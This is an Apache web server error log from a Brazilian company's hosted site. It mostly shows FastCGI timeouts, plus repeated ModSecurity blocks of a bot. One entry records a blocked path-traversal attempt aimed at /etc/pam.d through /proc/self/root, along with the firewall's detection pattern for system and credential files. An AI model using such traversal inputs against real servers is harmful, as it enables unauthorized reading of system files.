[Wed Mar 18 18:55:23.400005 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43010] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:56:08.376261 2026] [proxy_fcgi:error] [pid 29882:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43138] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:56:52.085942 2026] [proxy_fcgi:error] [pid 23798:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43292] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:57:57.909851 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43384] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:58:20.128014 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43722] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:58:51.133835 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43810] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:59:47.093971 2026] [proxy_fcgi:error] [pid 29882:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43908] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:59:54.935276 2026] [:error] [pid 15051:tid 140411699963648] [client 216.73.216.191:40871] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absgWimAPhZkrhU8w4mrCQAAAIU"]
[Wed Mar 18 19:00:19.997945 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44068] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:00:50.577830 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44156] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:01:26.892385 2026] [proxy_fcgi:error] [pid 9530:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44196] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:01:48.894722 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44392] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:03:15.949365 2026] [proxy_fcgi:error] [pid 9800:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44470] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:03:45.116693 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44788] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:04:12.761085 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44908] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:04:47.179360 2026] [proxy_fcgi:error] [pid 15051:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45034] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:05:14.096586 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45242] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:06:05.843591 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45340] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:06:29.148317 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45578] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:06:50.345943 2026] [proxy_fcgi:error] [pid 9530:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45866] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:07:13.278064 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45992] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:07:47.039856 2026] [proxy_fcgi:error] [pid 23798:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46114] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:07:47.347352 2026] [:error] [pid 23798:tid 140411658000128] [client 74.7.228.61:51598] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absiMz-9rzzdA3Ti0NCUBQAAAYo"]
[Wed Mar 18 19:09:09.674015 2026] [proxy_fcgi:error] [pid 15051:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46252] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:09:33.373836 2026] [proxy_fcgi:error] [pid 9800:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46578] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:09:56.476940 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46850] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:11:14.001901 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:12:01.745868 2026] [proxy_fcgi:error] [pid 9530:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47046] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:12:42.105906 2026] [proxy_fcgi:error] [pid 9333:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47094] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:13:04.434016 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47334] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:14:09.701861 2026] [proxy_fcgi:error] [pid 15051:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47470] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:14:55.913862 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47570] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:15:29.860022 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47642] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:17:02.925845 2026] [proxy_fcgi:error] [pid 9530:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47716] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:18:05.569813 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47894] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:18:22.365232 2026] [:error] [pid 9333:tid 140411691570944] [client 74.7.228.61:47736] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abskrg_eYRmh974Uj6QEoAAAAoY"]
[Wed Mar 18 19:18:27.327298 2026] [proxy_fcgi:error] [pid 14269:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48290] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:19:04.141864 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48468] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:19:56.040201 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48524] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:21:04.504149 2026] [proxy_fcgi:error] [pid 9530:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48640] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:21:28.245987 2026] [proxy_fcgi:error] [pid 9333:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48800] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:22:10.273871 2026] [proxy_fcgi:error] [pid 9530:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48868] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:22:13.750993 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.244.43:45032] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abslleoXxyEfFpUF8f-3WgAAAUU"]
[Wed Mar 18 19:23:14.383214 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48904] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:23:46.841799 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48996] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:25:12.232926 2026] [proxy_fcgi:error] [pid 27403:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49066] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:26:18.912410 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49154] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:26:42.105894 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49328] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:27:08.513553 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49476] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:27:41.021985 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49538] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:28:25.429816 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:49594] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:29:00.241884 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49630] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:29:58.257897 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49682] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:31:27.961932 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49794] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:32:20.333854 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49948] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:32:56.865061 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50336] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:33:39.517870 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50508] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:33:46.582330 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.228.61:47602] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absoSsdf6f5d65gmYZQXXwAAAtQ"]
[Wed Mar 18 19:34:13.777515 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50680] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:34:57.929440 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50744] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:35:23.958948 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50876] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:35:57.825924 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51048] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:36:33.465192 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51478] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:37:26.141840 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51858] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:38:15.874547 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] [client 179.188.53.243:51922] AH01067: Failed to read FastCGI header
[Wed Mar 18 19:38:15.874626 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (104)Connection reset by peer: [client 179.188.53.243:51922] AH01075: Error dispatching request to : 
[Wed Mar 18 19:38:46.573850 2026] [proxy_fcgi:error] [pid 9800:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:39:19.365273 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52112] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:40:09.589872 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52284] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:40:58.729179 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52620] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:41:21.329820 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52756] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:41:50.793860 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52980] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:42:26.357924 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53078] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:43:21.169956 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53182] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:44:07.671218 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.228.61:37316] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absqt-oXxyEfFpUF8f-3-QAAAUc"]
[Wed Mar 18 19:44:50.333867 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53234] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:45:19.998222 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53450] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:45:56.905851 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53512] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:46:35.880412 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] [client 179.188.53.243:53556] AH01067: Failed to read FastCGI header
[Wed Mar 18 19:46:35.880470 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (104)Connection reset by peer: [client 179.188.53.243:53556] AH01075: Error dispatching request to : 
[Wed Mar 18 19:46:57.113727 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53828] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:47:33.445785 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53914] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:48:02.087020 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.244.43:47224] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absrouyqAr6etmhZHNoKhAAAAEg"]
[Wed Mar 18 19:48:22.761907 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54084] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:49:01.009863 2026] [proxy_fcgi:error] [pid 9530:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54114] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:49:22.445921 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54484] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:49:53.198986 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54562] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:50:16.351129 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54752] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:50:58.514111 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54854] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:52:38.336288 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54936] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:53:05.881416 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55122] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:53:50.581883 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55202] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:53:53.320769 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.244.43:42488] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abstAfu8EFLIOrSqIptA6QAAAlc"]
[Wed Mar 18 19:54:22.561045 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55274] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:54:57.134093 2026] [proxy_fcgi:error] [pid 9530:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55318] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:55:33.025933 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55422] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:56:09.281847 2026] [proxy_fcgi:error] [pid 9800:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55484] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:56:40.119254 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55712] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:58:07.301956 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55778] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:58:35.325878 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55936] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 19:59:02.668610 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55992] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:00:00.897937 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.228.61:34702] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absucCmAPhZkrhU8w4mrkAAAAIw"]
[Wed Mar 18 20:00:03.913448 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56042] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:01:09.405789 2026] [proxy_fcgi:error] [pid 9800:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56168] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:01:36.049794 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56228] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:03:35.441818 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56314] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:04:56.001840 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56456] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:05:19.778108 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56780] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:05:57.319952 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56820] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:08:15.893018 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] [client 179.188.53.243:56868] AH01067: Failed to read FastCGI header
[Wed Mar 18 20:08:15.893064 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (104)Connection reset by peer: [client 179.188.53.243:56868] AH01075: Error dispatching request to : 
[Wed Mar 18 20:08:42.276546 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57130] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:09:11.273946 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57226] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:10:11.590434 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.228.61:58544] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absw0wkwaGbbGflqUZBVuAAAAMY"]
[Wed Mar 18 20:10:14.403610 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57252] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:11:35.898099 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] [client 179.188.53.243:57330] AH01067: Failed to read FastCGI header
[Wed Mar 18 20:11:35.898168 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (104)Connection reset by peer: [client 179.188.53.243:57330] AH01075: Error dispatching request to : 
[Wed Mar 18 20:11:59.977821 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57672] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:13:16.009863 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57714] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:14:56.018070 2026] [proxy_fcgi:error] [pid 9333:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57822] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:15:22.345952 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57950] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:15:46.705442 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:16:36.009809 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58100] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:18:15.901803 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] [client 179.188.53.243:58198] AH01067: Failed to read FastCGI header
[Wed Mar 18 20:18:15.901856 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (104)Connection reset by peer: [client 179.188.53.243:58198] AH01075: Error dispatching request to : 
[Wed Mar 18 20:18:47.317861 2026] [proxy_fcgi:error] [pid 9530:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58498] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:19:12.117867 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58582] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:19:46.746992 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.244.43:58168] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abszEuyqAr6etmhZHNoK3QAAAFc"]
[Wed Mar 18 20:19:56.101833 2026] [proxy_fcgi:error] [pid 9333:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58610] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:20:47.121255 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58702] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:21:13.644260 2026] [proxy_fcgi:error] [pid 23798:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58826] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:21:35.901904 2026] [proxy_fcgi:error] [pid 27403:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58936] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:21:59.613786 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59028] AH01075: Error dispatching request to : (polling)
